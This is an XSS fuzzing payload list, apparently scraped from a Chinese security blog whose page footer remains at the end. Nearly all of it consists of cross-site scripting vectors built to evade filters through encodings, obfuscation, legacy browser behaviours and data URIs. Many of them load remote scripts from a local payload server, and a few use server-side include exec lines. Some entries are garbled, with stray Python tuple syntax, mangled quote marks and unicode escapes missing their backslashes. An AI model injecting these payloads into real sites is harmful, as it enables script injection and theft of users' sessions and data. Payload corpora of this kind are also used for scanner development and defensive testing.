<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>

<a style="-o-link:‘javascript:javascript:alert(1)‘;-o-link-source:current">X

<style>p[foo=bar{}*{-o-link:‘javascript:javascript:alert(1)‘}{}*{-o-link-source:current}]{color:red};</style>

<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">KCF</a></a><a href="javascript:javascript:alert(1)">KCF</a><style>*[{}@import‘%(css)s?]</style>X

<div style="font-family:‘foo
;color:red;‘;">KCF

<div style="font-family:foo}color=red;">KCF

<// style=x:expression28javascript:alert(1)29>

<div style="list-style:url(http://foo.f)20url(javascript:javascript:alert(1));">X

<div id=d><div style="font-family:‘sans273B color3Ared3B‘">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>

<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X

<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X

<div id="x">KCF</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>

<script>ReferenceError.prototype.__defineGetter__(‘name‘, function(){javascript:alert(1)}),x</script>

<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._(‘javascript:alert(1)‘)()</script>

<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi

<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>

X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >

1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`>

1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;>

<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#kcf></vmlframe>

1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>

<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">KCF</a>

<xml id="kcf" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#kcf" datafld="payload"></label>

<event-source src="%(event)s" onload="javascript:alert(1)">

<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:KCF%0A%0A">

<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;">

<<SCRIPT>%(payload)s//<</SCRIPT>

<IMG SRC="javascript:javascript:alert(1)"

<STYLE>@import‘%(css)s‘;</STYLE>

<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">

<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>KCF

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);">

<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>

<STYLE>.KCF{background-image:url("javascript:javascript:alert(1)");}</STYLE><A class="KCF"></A>

<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>

<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>

<HTML xmlns:kcf><?import namespace="kcf" implementation="%(htc)s"><kcf:kcf>KCF</kcf:kcf></HTML>""","XML namespace."),("""<XML ID="kcf"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#KCF" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="KCF&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML>

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-

<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X

<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>

<P STYLE="behavior:url(‘#default#time2‘)" end="0" onEnd="javascript:alert(1)">

<STYLE>a{background:url(‘s1‘ ‘s2)}@import javascript:javascript:alert(1);‘);}</STYLE>

<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>

<?xml version="1.0"?><html:html xmlns:html=‘http://www.w3.org/1999/xhtml‘><html:script>javascript:alert(1);</html:script></html:html>

<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>

<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed>

<iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>">

alert(String.fromCharCode(75,67,70))//";alert(String.fromCharCode(75,67,70))//--

></SCRIPT>">‘><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

<IMG """><SCRIPT>alert("KCF")</SCRIPT>">

perl -e ‘print "<IMG SRC=javascript:alert("KCF")>";‘ > out

<<SCRIPT>alert("KCF");//<</SCRIPT>

<IMG SRC="javascript:alert(‘KCF‘)"

</TITLE><SCRIPT>alert("KCF");</SCRIPT>

<STYLE>li {list-style-image: url("javascript:alert(‘KCF‘)");}</STYLE><UL><LI>KCF</br>

<STYLE>BODY{-moz-binding:url("http://127.0.0.1:3555/xss_serve_payloads/kcf.xml#kcf")}</STYLE>

<STYLE>@import‘javasc
ipt:alert("KCF")‘;</STYLE>

exp/*<A STYLE=‘noKCF:noKCF("*//*");KCF:ex/*KCF*//*/*/pression(alert("KCF"))‘>

<STYLE TYPE="text/javascript">alert(‘KCF‘);</STYLE>

<STYLE>.KCF{background-image:url("javascript:alert(‘KCF‘)");}</STYLE><A class="KCF"></A>

<STYLE type="text/css">BODY{background:url("javascript:alert(‘KCF‘)")}</STYLE>

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnS0NGJyk8L3NjcmlwdD4=">

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(‘KCF‘);">

<object type="text/x-scriptlet" data="http://127.0.0.1:3555/xss_serve_payloads/kcf.js"></object>

<object type="text/x-scriptlet" data="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></object>

<OBJECT TYPE="text/x-scriptlet" DATA="http://127.0.0.1:3555/xss_serve_payloads/kcf.html"></OBJECT>

<EMBED SRC="data:image/svg+xml;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

<!--#exec cmd="/bin/echo ‘<SCR‘"--><!--#exec cmd="/bin/echo ‘IPT SRC=http://127.0.0.1:3555/xss_serve_payloads/kcf.js></SCRIPT>‘"-->

<!--#exec cmd="/bin/echo ‘<SCR‘"--><!--#exec cmd="/bin/echo ‘IPT SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp></SCRIPT>‘"-->

<? echo(‘<SCR)‘;echo(‘IPT>alert("KCF")</SCRIPT>‘); ?>

Redirect 302 /axaakcf.jpg http://127.0.0.1:3555/xss_serve_payloads/kcf.html

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘KCF‘)</SCRIPT>">

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(‘KCF‘);+ADw-/SCRIPT+AD4-

<input/onmouseover="javaSCRIPT&colon;confirm(1)"

<sVg><scRipt %00>alert(1) {Opera}

<img/src=`%00` onerror=this.onerror=confirm(1)

<form><isindex formaction="javascript&colon;confirm(1)"

<img src=`%00`&NewLine; onerror=alert(1)&NewLine;

<script/&Tab; src=‘http://127.0.0.1:3555/xss_serve_payloads/kcf.js‘ /&Tab;></script>

<script/&Tab; src=‘http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp‘ /&Tab;></script>

<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?

<iframe/src="data:text/html;&Tab;base64&Tab;,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=">

"><h1/onmouseover=‘u0061lert(1)‘>%00

<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>

<svg><script xlink:href=data&colon;,window.open(‘https://127.0.0.1:3555/xss_serve_payloads/kcf.html‘)></script

<form><a href="javascript:u0061lert(1)">X

</script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror=‘eval(src)‘>

<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4="&#09;&#10;&#11;>X</a

http://www.keralacyberforce<script .in>alert(document.location)</script

<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a

<img/[email protected]  onerror = prompt(‘1‘)

</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(

</form><input type="date" onfocus="alert(1)">

<script /***/>/***/confirm(‘uFF41uFF4CuFF45uFF52uFF54u1455uFF11u1450‘)/***/</script /***/

<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>

<///style///><span %2F onmousemove=‘alert(1)‘>SPAN

<img/src=‘http://127.0.0.1:3555/xss_serve_payloads/jpg.jpg‘ onmouseover=&Tab;prompt(1)

"><svg><style>{-o-link-source&colon;‘<body/onload=confirm(1)>‘

<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}

<marquee onstart=‘javascript:alert(1)‘>^__^

<div/style="width:expression(confirm(1))">X</div> {IE7}

//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type=‘submit‘>//

/*iframe/src*/<iframe/src="<iframe/[email protected]"/onload=prompt(1) /*iframe/src*/>

//|\ <script //|\ src=‘http://127.0.0.1:3555/xss_serve_payloads/kcf.js‘> //|\ </script //|\

//|\ <script //|\ src=‘http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp‘> //|\ </script //|\

</font>/<svg><style>{src&#x3A;‘<style/onload=this.onload=confirm(1)>‘</font>/</style>

</plaintext></|><plaintext/onmouseover=prompt(1)

</svg>‘‘<svg><script ‘AQuickBrownFoxJumpsOverTheLazyDog‘>alert&#x28;1&#x29;

<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">

<%

<input value=<><iframe/src=javascript:confirm(1)

http://www.<script>alert(1)</script .com

<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>

<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>

<math><a xlink:href="//127.0.0.1:3555/xss_serve_payloads/kcf.js">KCF

<math><a xlink:href="//127.0.0.1:3555/xss_serve_payloads/bmpz.bmp">KCF

<embed code="http://127.0.0.1:3555/xss_serve_payloads/kcf.swf" allowscriptaccess=always>

<a href="data:text/html;base64_,<svg/onload=u0061l&#101%72t(1)>">X</a

<script>~‘u0061‘ ; u0074u0068u0072u006Fu0077 ~ u0074u0068u0069u0073. u0061u006Cu0065u0072u0074(~‘u0061‘)</script U+

<script/src="data&colon;text%2Fju0061vu0061script,u0061lert(‘u0061‘)"></script a=u0061 & /=%2F

<script/src=data&colon;text/ju0061vu0061&#115&#99&#114&#105&#112&#116,u0061%6C%65%72%74(/KCF/)></script

<body/onload=<!-->&#10alert(1)>

<img src ?kcf?/onerror = alert(1)

<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>KCF

<div/onmouseover=‘alert(1)‘> style="x:">

<--`<img/src=` onerror=alert(1)> --!>

<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>

<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>

"><img src=x onerror=window.open(‘https://127.0.0.1:3555/xss_serve_payloads/kcf.html‘);>

<form><button formaction=javascript&colon;alert(1)>KCF

<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgnS0NGJyk8L3NjcmlwdD4=></object>

<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>

<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">KCF</a>

<sVg><scRipt %00>prompt(/

w=window.open(‘invalidfileinvalidfileinvalidfile‘,‘target‘);setTimeout(‘alert(w.document.location);w.close();‘,1);

try%7Balert(1)%7Dcatch(e)%7Blocation.reload()%7D

0\%22))}catch(e){alert(1)}//

<img src=x > onerror="console.alert(document.getElementsByTagName(‘html‘)[0].innerHTML)">

<script> chr=String.fromCharCode(1); result=‘‘; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(1); } </script>

<script> chr=String.fromCharCode(1); result=‘‘; try{ result=encodeURI(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(1); } </script>

<img src=x > onerror=alert(1)>

"‘><img src="xx:xx" on error="alert(1);">

<META HTTP-EQUIV="refresh" CONTENT="0.1; URL=javascript:void()//?;URL=javascript:alert(1)//">

<script> document.cookie=‘kcf‘; if(document.cookie !== ‘kcf‘) { alert(1,document.cookie); } </script>

htmlStr = ‘<a href="javascript:alert(1)">kcf</a>‘; document.getElementById(‘body‘).innerHTML = htmlStr; try { alert(1);}catch(e){alert(1);};

htmlStr = ‘<a href="javascript:alert(1)">kcf</a>‘; document.getElementById(‘body‘).innerHTML = htmlStr; try { if(document.getElementById(‘body‘).firstChild.protocol === ‘javascript:‘) { alert(1); } }catch(e){alert(1);};

<img src=x:xx onerror="try {execScript(‘a=1‘,‘vbs‘);alert(1);}catch(e){alert(1);}">

`"‘><img src="# onerror=alert(1)>

--><img src=xxx:x onerror=alert(1)> -->

<body> §iframe onload=confirm(/kcf/)&gt; <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace(‘§‘,‘<‘)"> </body>

<b id="id1" x=begin0x9fa0end >`‘"></b><script>if (!/begin.end/.test(document.getElementById(‘id1‘).getAttribute(‘x‘))) { alert(1);}</script>

<b id="id1" x=begin0x2924end >`‘"></b><script>if (!/begin.end/.test(document.getElementById(‘id1‘).getAttribute(‘x‘))) { alert(1);}</script>

<title>kcf<script>alert(1)</script></title>

"`‘><script>alert(1)</script>

<div class="foo1">kcf</div> <script>document.getElementsByClassName(‘foo1‘)[0]?alert(1):0</script>

"`‘/><img/onload=alert(1) src=""/>

"‘`>kcf<div style="font-family:‘foo;x:expression(alert(1));/*‘;">kcf

"‘`>kcf<div style="font-family:‘foo‘x:expression(alert(1));/*‘;">kcf

"‘`><script>a=/kcf;;i=0;alert(1);a/i;</script>

<a href="><script>alert(1)</script>" />

"‘`><p><svg><script>a=‘kcf;alert(1)//‘;</script></p>

<p><svg><script>alert(1)</script></p>

kcf<div style="x:expression(alert(1))">kcf

kcf<div style="xexpression(alert(1))">kcf

"‘`><script>alert(1)</script>

"‘`><img src=xxx:x onerror=alert(1)>

‘`"><script>alert(1)</script>

`"‘><img src=xxx:x onerror=alert(1)>

‘"`><script>/* *alert(1)// */</script>

`‘"><script>window[‘alert‘](1)</script>

u0031+u0031u005b‘145166141154‘u005du0028‘141154145162164506151‘u0029

u0030u005bu0022x65x76x61x6C"u005du0028u0027x61x6Cx65x72x74x28x31x29‘u0029

0[‘eval‘](‘alert(1)‘)

<a href="javascript:u0031+u0031u005b‘145166141154‘u005du0028‘141154145162164506151‘u0029">kcf</a>

<a href="&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x5C&#x75&#x30&#x30&#x33&#x31&#x2B&#x5C&#x75&#x30&#x30&#x33&#x31&#x5C&#x75&#x30&#x30&#x35&#x62&#x27&#x5C&#x31&#x34&#x35&#x5C&#x31&#x36&#x36&#x5C&#x31&#x34&#x31&#x5C&#x31&#x35&#x34&#x27&#x5C&#x75&#x30&#x30&#x35&#x64&#x5C&#x75&#x30&#x30&#x32&#x38&#x27&#x5C&#x31&#x34&#x31&#x5C&#x31&#x35&#x34&#x5C&#x31&#x34&#x35&#x5C&#x31&#x36&#x32&#x5C&#x31&#x36&#x34&#x5C&#x35&#x30&#x5C&#x36&#x31&#x5C&#x35&#x31&#x27&#x5C&#x75&#x30&#x30&#x32&#x39">kcf</a>

<input id=‘1‘><input id=1><script>alert(1)</script>

<a href="invalid:1" id=x name=y>kcf</a><a href="invalid:2" id=x name=y>kcf</a><script>alert(x.y[0])</script>

<a href=1 name=x>kcf</a><a href=1 name=x>kcf</a><script>alert(x.removeChild)//undefinedalert(x.parentNode)//undefined</script>

<a href="123" id=x>kcf</a><script>x=‘javascript:alert(1)‘//only in compat!;</script>

<form name=self location="javascript:alert(1)"></form><script>if(top!=self){ top.location=self.location}</script>

<form name=self location="javascript&amp;#58;alert(1)"></form><script>if(top!=self){ top.location=self.location}</script>

<iframe name=x></iframe>"></iframe><a href="http://127.0.0.1:3555/xss_serve_payloads/kcf.html" target=x id=x></a><script>window.onload=function(){x.click()}</script>

%3Cform%20name%3D%22body%22%20onmouseover%3D%22alert(1)%22%20style%3D%22height%3A800px%22%3E%3Cfieldset%20name%3D%22attributes%22%3E%3Cform%3E%3C%2Fform%3E%3Cform%20name%3D%22parentNode%22%3E%3Cimg%20id%3D%22attributes%22%3E%3C%2Fform%3E%3C%2Ffieldset%3E%3C%2Fform%3E

"onmouseover="alert(1)"a="

‘onmouseover=‘alert(1)‘a=‘

‘%20onmouseover=alert(1)‘

%22%20onmouseover=javascript:alert(1)%20%22

‘);alert(1);//

);alert(1)//

‘);alert(1)//

%26%2339;-alert(1)//

%22);alert(1);//

%E0<body onload=alert(1)>

%00<body onload=alert(1)>

kcf‘%20alert(1)%2F%2F

kcf%22%20alert(1)%2F%2F

%5C%5C‘%2Balert(1)%3B%2F%2F

%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E

alert(1)%3B

%3Cscript%3Ea%3D%2FKCF%2F

alert(1)%3C%2Fscript%3E

%22%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E

kcf%20-%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E

kcf%20%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E

<SCRIPT>alert(1);</SCRIPT>

"><IMG SRC=javascript:alert(1)>

<META HTTP-EQUIV="Link" Content="<javascript:alert(1)>; REL=stylesheet">

<STYLE>.KCF{background-image:url("javascript:alert(1)");}</STYLE><A class="KCF"></A>

<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert(1);">

0<aside xmlns="x><img src=x onerror=alert(1)">1</aside>

0<aside xmlns="x><script>alert(1)</script>">1</aside>

0<aside xmlns="foo:img src=x onerror=alert(1)>">123

<p style="font-family: ‘foo273b color3a expression(alert(1))/*

<p style="font-family: ‘foo&amp;x5c;27&amp;#x5c;3bx:expr&amp;#x65;ession(alert(1))‘">

<svg><script xlink:href=data&colon;,window.open(‘http://www.opensecurity.in‘)></script

http://www.opensecurity<script .in>alert(document.location)</script

<blink/ onmouseover=prompt(1)>OnMouseOver

<math><a xlink:href="//127.0.0.1:3555/xss_serve_payloads/kcf.js">click

<embed code="http://127.0.0.1:3555/xss_serve_payloads/flash.swf" allowscriptaccess=always>

<img src ?itworksonchrome?/onerror = alert(1)

<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe

"><img src=x onerror=window.open(‘http://www.opensecurity.in/‘);>

<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=></object>

<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

<input+onfocus=alert(1)>

</script>"><script>prompt(1)</script>

</ScRiPt>"><ScRiPt>prompt(1)</ScRiPt>

"><img src=x onerror=prompt(1)>

"><svg/onload=prompt(1)>

"><iframe/src=javascript:prompt(1)>

"><h1 onclick=prompt(1)>Clickme</h1>

"><a href=javascript:prompt(1)>Clickme</a>

"><a href="javascript:confirm%28 1%29">Clickme</a>

"><a href="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+">click</a>

"><textarea autofocus onfocus=prompt(1)>

"><a/href=javascript&colon;cou006efiru006d("1")>clickme</a>

"><script>cou006efiru006d`1`</script>

"><ScRiPt>cou006efiru006d`1`</ScRiPt>

"><img src=x onerror=cou006efiru006d`1`>

"><svg/onload=cou006efiru006d`1`>

"><iframe/src=javascript:cou006efiru006d%28 1%29>

"><h1 onclick=cou006efiru006d(1)>Clickme</h1>

"><a href=javascript:prompt%28 1%29>Clickme</a>

"><a href="javascript:cou006efiru006d%28 1%29">Clickme</a>

"><textarea autofocus onfocus=cou006efiru006d(1)>

"><details/ontoggle=cou006efiru006d`1`>clickmeonchrome

"><p/id=1%0Aonmousemove%0A=%0Aconfirm`1`>hoveme

"><img/src=x%0Aonerror=prompt`1`>

"><iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;">

"><h1/ondrag=cou006efiru006d`1`)>DragMe</h1>

以上是关于常用xss fuzz 列表的主要内容，如果未能解决你的问题，请参考以下文章

XSS-Fuzz的艺术丨咖面100期

利用XSStrike Fuzzing XSS漏洞

ByPass安全狗XSS的Fuzz思路及实现

Web安全原理剖析（十七）——XSS常用语句及编码绕过

XSS常用技巧

文件上传漏洞fuzz字典生成脚本小工具分享